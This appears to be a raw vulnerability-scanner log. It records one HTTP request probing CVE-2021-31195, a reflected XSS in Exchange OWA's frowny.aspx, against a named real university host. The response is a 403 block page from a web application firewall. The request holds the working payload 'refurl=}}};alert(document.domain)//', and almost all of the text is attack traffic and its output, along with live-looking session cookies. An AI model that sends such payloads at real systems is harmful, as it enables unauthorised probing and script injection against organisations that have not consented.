[CVE-2021-31195] Dumped HTTP request for https://emt.ormond.unimelb.edu.au/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//


GET /owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)// HTTP/1.1
Host: emt.ormond.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2021-31195] Dumped HTTP response https://emt.ormond.unimelb.edu.au/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 834
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3129151=dn1x42d/SuOopwL21/NEIAtyk2gAAAAAQUIPAAAAAADV3lXCsudFMv1HlMu2s6rb; expires=Thu, 06 Aug 2026 08:08:47 GMT; HttpOnly; path=/; Domain=.ormond.unimelb.edu.au
Set-Cookie: incap_ses_1540_3129151=3Y4KVPZSIxnF2WxVQi5fFQtyk2gAAAAAaFz7Vjt2UHR5rwPV/8IlOA==; path=/; Domain=.ormond.unimelb.edu.au
X-Iinfo: 12-9369150-0 0NNN RT(1754493451937 10) q(0 -1 -1 -1) r(0 -1) B15(1,903758,0) U18

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/Lime-king-Seruants-giues-the-does-we-with-my-for" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=12-9369150-0%200NNN%20RT%281754493451937%2010%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%281%2c903758%2c0%29%20U18&incident_id=1540000460019845893-44501156982164364&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 1540000460019845893-44501156982164364</iframe></body></html>
